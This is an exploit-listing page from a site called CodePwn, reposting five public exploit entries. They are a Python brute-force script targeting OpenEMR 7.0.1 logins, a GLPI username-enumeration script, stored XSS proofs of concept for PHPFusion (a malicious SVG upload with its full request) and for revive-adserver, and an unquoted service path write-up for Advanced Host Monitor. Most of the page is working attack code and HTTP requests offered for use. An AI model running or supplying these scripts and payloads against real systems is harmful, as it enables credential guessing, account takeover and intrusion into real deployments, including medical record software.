Latest exploits :: CodePwn

<pre><code># Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force # Date: 2023-04-28 # Exploit Author: abhhi (Abhishek Birdawade) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz # Version: 7.0.1 # Tested on: Windows ''' Example Usage: - python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt ''' import requests import sys import argparse, textwrap from pwn import * #Expected Arguments parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.") parser.add_argument("-ul","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print (f"Exploit Usage: python3 exploitBF.py -h") sys.exit(1) # Variable LoginPage = args.url Username = args.username Username_list = args.userlist Password_list = args.passlist log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force') #Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'Origin' : f"{LoginPage}", } #POST REQ data postreqcontent = { 'new_login_session_management' : 1, 'languageChoice' : 1, 'authUser' : f"{Username}", 'clearPass' : f"{Password}" } #Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) #Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/interface/main/tabs/main.php" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) #Reading User.txt & Pass.txt files if Username_list: userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines() for Password in passfile: Password = Password.strip() login(Username,Password) </code></pre>

<pre><code>Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) Application: PHPFusion Version: 9.10.30 Bugs: XSS Technology: PHP Vendor URL: https://www.php-fusion.co.uk/home.php Software Link: https://sourceforge.net/projects/php-fusion/ Date of found: 28-04-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1 Host: localhost Content-Length: 1198 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0 Connection: close ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="reqid" 187c77be8e52cf ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]" SVG_XSS.svg ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="mtime[]" 1681116842 ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="overwrite" 0 ------WebKitFormBoundaryxF2jB690PpLWInAA-- 3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file( http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg) poc video : https://youtu.be/6yBLnRH8pOY </code></pre>

<pre><code># Exploit Title: GLPI 9.5.7 - Username Enumeration # Date: 04/29/2023 # Author: Rafael B. # Vendor Homepage: https://glpi-project.org/pt-br/ # Affected Versions: GLPI version 9.1 <= 9.5.7 # Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz import requests from bs4 import BeautifulSoup # Send a GET request to the page to receive the csrf token and the cookie session response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') # Parse the HTML using BeautifulSoup soup = BeautifulSoup(response.content, 'html.parser') # Find the input element with the CSRF token csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) # Extract the CSRF token if it exists if csrf_input: csrf_token = csrf_input['value'] # Extract the session cookie session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Set the custom url where the GLPI recover password is located url = "http://127.0.0.1:80/glpi/front/lostpassword.php" headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} # Open the email list file and read each line with open('emails.txt', 'r') as f: email_list = f.readlines() # Loop through the email list and make a POST request for each email for email in email_list: email = email.strip() data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token} cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value} freq = requests.post(url, headers=headers, cookies=cookies, data=data) # Do a new GET request to get the updated CSRF token and session cookie for the next iteration response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') soup = BeautifulSoup(response.content, 'html.parser') csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) if csrf_input: csrf_token = csrf_input['value'] session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Parse the response and grep the match e-mails soup = BeautifulSoup(freq.content, 'html.parser') div_center = soup.find('div', {'class': 'center'}) Result = (f"Email: {email}, Result: {div_center.text.strip()}") if "An email has been sent to your email address. The email contains information for reset your password." in Result: print ("\033[1;32m Email Found! -> " + Result) </code></pre>

<pre><code># Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path # Date: 2023-04-23 # CVE: CVE-2023-2417 # Exploit Author: MrEmpy # Vendor Homepage: https://www.ks-soft.net # Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm # Version: > 12.56 # Tested on: Windows 10 21H2 Title: ================ Advanced Host Monitor > 12.56 - Unquoted Service Path Summary: ================ An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service. An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name and located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning. To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path to correctly quote the full path of the executable, including quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks. Proof of Concept: ================ C:\>sc qc ActiveRMAService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveRMAService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KS Active Remote Monitoring Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem </code></pre>

<pre><code>Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Application: revive-adserver Version: 5.4.1 Bugs: XSS Technology: PHP Vendor URL: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/ Date of found: 31-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to create banner 2. select the advanced section 3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) POST /www/admin/banner-advanced.php HTTP/1.1 Host: localhost Content-Length: 213 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 Connection: close clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet We are sending this link to the admin. then if admin clicks it will be exposed to xss http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 </code></pre>